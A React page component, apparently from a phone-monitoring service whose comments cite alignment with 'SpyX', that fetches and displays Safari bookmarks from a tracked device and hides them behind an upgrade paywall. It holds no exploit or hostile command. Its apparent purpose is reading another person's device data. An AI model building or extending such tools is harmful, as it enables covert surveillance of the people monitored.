import { useState, useEffect, useRef, useCallback } from 'react'
import { useExtremeUpgradeRefresh } from 'src/hooks/useExtremeUpgradeRefresh'


import { useTranslation } from 'src/utils/i18n'

import Grid from '@mui/material/Grid'
import Icon from 'src/@core/components/icon'
import styles from '../../../styles/browser-bookmark.module.scss'
import TextField from '@mui/material/TextField'
import InputAdornment from '@mui/material/InputAdornment'
import Card from '@mui/material/Card'
import Image from 'next/image'
import Link from 'next/link'
import dayjs from 'dayjs'

import { Pagination } from 'antd'

// request
import { getSafariBookmark } from 'src/@api/dashboard'

import { useDispatch, useSelector } from 'react-redux'
import { setCurrentTab, changeExtremeService } from 'src/store/apps/Common'
import { generateMockData } from 'src/utils'
import ExtremeUpgradeModal from 'src/@core/components/modal/extreme-upgrade'
import { useExtremeFeatureAccessGate } from 'src/hooks/useExtremeFeatureAccessGate'
import { getUserAccountOrder } from 'src/@api/login'

const BrowserBookmark = () => {
  const store = useSelector(state => state.Common)

  const { t, locale } = useTranslation('common')

  let Advanced = window.localStorage.getItem('Advanced')
  Advanced = Advanced == null || Advanced == 0 ? true : false
  const [initHistoryData, setInitHistoryData] = useState([])

  const [historyData, setHistoryData] = useState([])

  const [selectData, setSelectData] = useState({
    id: 1,
    category: 'SAFARI_HISTORY',
    name: 'Safari',
    icon: '/images/history/safari.png',
    contents: []
  })

  const [active, setActive] = useState(1)

  const [total, setTotal] = useState(0)
  const [page, setPage] = useState(1)
  const [pageSize, setPageSize] = useState(20)
  const [isLoading, setIsLoading] = useState(true) //正在加载获取数据
  const [advanced, setAdvanced] = useState(true) // 是否购买高级服务
  const [fetchLoading, setFetchLoading] = useState(true) // 数据获取中
  const basicNotOver = [null, ''].includes(store.resetTime.basicUpdateDownloadTime) // 是否未完成一步验证
  const advancedNotOver = [null, ''].includes(store.resetTime.advancedUpdateDownloadTime) // 高级数据未下载完成（空 = 未完成）
  // 高级功能门控（对齐 SpyX）：未绑高级 → 跳 /ios/extreme-verification；数据未就绪 → 暂停渲染
  const { gatePending, showUpgradeModal } = useExtremeFeatureAccessGate(advanced)
  const [justVerified, setJustVerified] = useState(false) // 是否为刚完成验证

  const onChangePage = async (page, pageSize) => {
    setData({
      username:
        JSON.parse(localStorage.getItem('DeviceUser')) != null
          ? JSON.parse(localStorage.getItem('DeviceUser')).username
          : '',
      params: {
        category: 'SAFARI_BOOKMARK',
        offset: (page - 1) * pageSize,
        limit: pageSize,
        deviceUdid:
          JSON.parse(localStorage.getItem('currentDevice')) != null
            ? JSON.parse(localStorage.getItem('currentDevice'))['Unique Identifier']
            : ''
      }
    })
  }

  // 分页参数
  const [pagination, setPagination] = useState({
    reqNum: 50, // 单次查询数量
    nowOffset: 0, // 偏移量
    maxNum: false // 全部数据查询完毕
  })

  let setData = async nowOffset => {
    let arr = [
      {
        id: 1,
        category: 'SAFARI_HISTORY',
        name: 'Safari',
        icon: '/images/history/safari.png',
        contents: []
      },
      {
        id: 2,
        category: 'CHROME_HISTORY',
        name: 'Chrome',
        icon: '/images/history/chrome.png',
        contents: []
      }
    ]

    const username = JSON.parse(localStorage.getItem('DeviceUser')) != null
      ? JSON.parse(localStorage.getItem('DeviceUser')).username
      : ''

    // 获取最近的10笔订单
    let res = await getUserAccountOrder({ page: 1, pageSize: 10 })

    // 查找有限期最长的订单
    const lastOrder = res.data.sort((a, b) => dayjs(b.expire_time).valueOf() - dayjs(a.expire_time).valueOf())[0]

    // 计算是否为增值服务上线前付费用户

    // 增值服务上线前付费用户状态更新

    let response = await getSafariBookmark({
      username,
      params: {
        category: 'SAFARI_BOOKMARK',
        offset: nowOffset,
        limit: pagination.reqNum,
        deviceUdid:
          JSON.parse(localStorage.getItem('currentDevice')) != null
            ? JSON.parse(localStorage.getItem('currentDevice'))['Unique Identifier']
            : ''
      }
    })
    setIsLoading(false)
    const advanced = username == null || !('advanced' in response) || ['true', true].includes(response?.advanced) // 高级服务开通状态
    setAdvanced(advanced)
    dispatch(changeExtremeService(advanced)) // 更新高级服务状态

    if (response.data.contents == null) {
      setPagination(page => ({ ...page, maxNum: true }))
      setFetchLoading(false)

      return
    }

    arr[0].contents = response.data.contents.map(item => {
      return {
        ...item,
        time: dayjs.unix(item.visitTime + 978278400).format('MM-DD ,hh:mm')
      }
    })

    if (advanced) {
      if (total > 0) {
        setSelectData(old => ({ ...old, contents: [...old.contents, ...arr[0].contents] }))
        setInitHistoryData(old => ([{ ...old[0], contents: [...old[0].contents, ...arr[0].contents] }, { ...old[1], contents: [...old[1].contents, ...arr[1].contents] }]))
        setHistoryData(old => ([{ ...old[0], contents: [...old[0].contents, ...arr[0].contents] }, { ...old[1], contents: [...old[1].contents, ...arr[1].contents] }]))
      } else {
        setSelectData(arr[0])
        setInitHistoryData(arr)
        setHistoryData(arr)
      }
    } else {
      arr[0].contents = generateMockData(arr[0].contents)
      setSelectData(arr[0])
      setInitHistoryData(arr)
      setHistoryData(arr)
    }
    setTotal(response.data.totalCount)
    setFetchLoading(false)
  }

  useEffect(() => {
    const nowOffset = 0
    setData(nowOffset)
  }, [])

  const dom = useRef(null)

  // 滚动百分比
  const [scroll, setScroll] = useState(0)

  // 升级成功后：预缓冲已在 notify 完成，这里重拉详情读 advanced
  useExtremeUpgradeRefresh(
    useCallback(() => {
      setAdvanced(true)
      setHistoryData([])
      setInitHistoryData([])
      setSelectData({})
      setTotal(0)
      setPagination({ reqNum: 50, nowOffset: 0, maxNum: false })
      setScroll(0)
      setFetchLoading(true)
      setData(0)
    }, [])
  )

  // 获取滚动百分比
  useEffect(() => {
    const handScroll = () => {
      if (dom.current) {
        const { scrollTop, scrollHeight, clientHeight } = dom.current
        const progress = (scrollTop / (scrollHeight - clientHeight)) * 100

        setScroll(progress.toFixed(0))
      }
    }

    const currentRef = dom.current
    if (currentRef) {
      currentRef.addEventListener('scroll', handScroll)
    }

    return () => {
      if (currentRef) {
        currentRef.removeEventListener('scroll', handScroll)
      }
    }
  }, [])

  // 监听滚动百分比
  useEffect(() => {
    if (scroll >= 100 && advanced) {
      const nowOffset = pagination.nowOffset + pagination.reqNum
      setPagination(page => ({ ...page, nowOffset }))

      if (!pagination.maxNum) setData(nowOffset)
    }
  }, [scroll])

  // 处理当前搜索
  const handleFilter = e => {
    let value = e.target.value
    if (value === '') {
      setHistoryData(initHistoryData)

      return
    }

    // 搜索过滤

    let filterData = initHistoryData.filter(item => {
      return item.name.toLowerCase().indexOf(value.toLowerCase()) !== -1
    })

    setHistoryData(filterData)
  }

  // 处理当前选中数据
  const handleSelectClick = id => {
    setActive(id)

    let data = historyData.find(item => {
      return item.id === id
    })

    setSelectData(data)
  }

  const dispatch = useDispatch()

  useEffect(() => {
    const title = t('Browser bookmark')
    dispatch(setCurrentTab(title))

    return () => dispatch(setCurrentTab(''))
  }, [dispatch, locale])

  return (
    <>
      {/* <Card>
        <Grid container spacing={0} height={'auto'} minHeight={900}>
          <Grid item xs={12} md={3} lg={3}>
            <div className={styles.leftBox}>
              <div className={styles.list}>
                <ul className={styles.ul}>
                  {historyData.map((row, index) => (
                    <li
                      className={active !== row.id ? styles.li : `${styles.li} ${styles.liHighlight}`}
                      key={index}
                      onClick={() => handleSelectClick(row.id)}
                    >
                      <div className={styles.img}>
                        <Image src={row.icon} width={30} height={30} alt='' />
                      </div>
                      <div className={styles.text}>
                        <span className={styles.name}>{row.name}</span>
                      </div>
                    </li>
                  ))}
                </ul>
              </div>
            </div>
          </Grid>
          <Grid item xs={12} md={9} lg={9}>
            <div className={styles.rightBox}>
              <div className={styles.header}>
                <div className={styles.showIcon}>
                  <Image src={selectData.icon} width={30} height={30} alt='' />
                  <span className={styles.iconName}>{selectData.name}</span>
                </div>
              </div>

              <div className={styles.content}>
                <Card sx={{ marginBottom: '10px' }}>
                  <div className={styles.contentHeader}>{t('Browser bookmark')}</div>
                  <div className={styles.main}>
                    <ul className={styles.mainUl}>
                      {selectData.contents.length > 0
                        ? selectData.contents.map((row, index) => (
                            <li className={styles.mainLi} key={index}>
                              <div className={styles.mainShow}>
                                <Image src='/images/history/safari.png' width={16} height={16} alt='' />
                                <span className={styles.mainShowTitle}>{row.title}</span>
                                <Link className={styles.mainShowHref} href={row.url}>
                                  {row.url}
                                </Link>
                              </div>
                            </li>
                          ))
                        : null}
                    </ul>
                  </div>
                </Card>
                <div style={{ textAlign: 'right' }}>
                  <Pagination total={total} defaultPageSize={20} defaultCurrent={1} onChange={onChangePage} />
                </div>
              </div>
            </div>
          </Grid>
        </Grid>
      </Card> */}

      <div className='bg-[#FFF] drop-shadow-[0_0_12px_rgba(0,0,0,0.13)] rounded-[10px] Bxl:h-[calc(var(--vh2)*100-94px)] Bxls:Headers5:h-[calc(var(--vh2)*100-149px)] Header5:big:h-[calc(var(--vh2)*100-214px)] bigs:h-[calc(var(--vh2)*100-274px)] flex flex-col relative'>
        {
          !fetchLoading && !gatePending &&
          <>
            {
              (!basicNotOver && !advancedNotOver && !justVerified) ?
                <>
                  {/* 高级服务开通提示 */}
                  {showUpgradeModal && <ExtremeUpgradeModal open />}
                </>
                :
                <>
                  {/* 增值服务 iCloud验证流程 */}
                </>
            }

          </>
        }

        <div className={`w-full px-[10px] pt-[10px] pb-[15px] border-b border-[#E5E7EB] ${!advanced ? 'blur-[16px] select-none' : ''}`}>
          {historyData.map((row, index) => (
            <div
              key={index}
              className={`${active === row.id ? 'bg-[#E5E5E5]' : ''
                } w-full h-[48px] flex items-center px-[20px] rounded-[6px] cursor-pointer`}
              onClick={() => advanced && handleSelectClick(row.id)}
            >
              <Image src={row.icon} width={30} height={30} alt='' />

              <span className='text-[14px] font-[600] text-[#334062] ml-[9px]'>{row.name}</span>
            </div>
          ))}
        </div>
        <div ref={dom} className={`flex-1 p-[20px] ${advanced ? 'overflow-auto' : 'overflow-hidden blur-[16px] select-none'}`}>
          {selectData.contents.map((row, index) => (
            <div key={index} className='w-full flex items-start mb-[8px]'>
              <Image className='mt-[2px]' src='/images/history/safari.png' width={16} height={16} alt='safari' />
              <div className='text-[13px] ml-[9px] w-[calc(100%-25px)]'>
                <div className='text-[#222] overflow-hidden text-nowrap text-ellipsis'>{row.title}</div>
                {
                  advanced ?
                    <Link className='w-full' href={row.url}>
                      <div className='w-full text-[#646464] overflow-hidden text-nowrap text-ellipsis'>{row.url}</div>
                    </Link>
                    :
                    <p className='w-full text-[#646464] overflow-hidden text-nowrap text-ellipsis'>{row.url}</p>
                }
              </div>
            </div>
          ))}
        </div>
      </div>
      {advanced && historyData.length == 0 && !isLoading &&
        <div className='text-center px-5 absolute inset-0 flex justify-center items-center pointer-events-none'>
          {t('It appears theres no data to show here yet')}<br />
          {t('If data exists it may take up to 1 hour to download and appear')}<br />
          {t('We suggest checking back in a little while')}
        </div>}
    </>
  )
}

export default BrowserBookmark


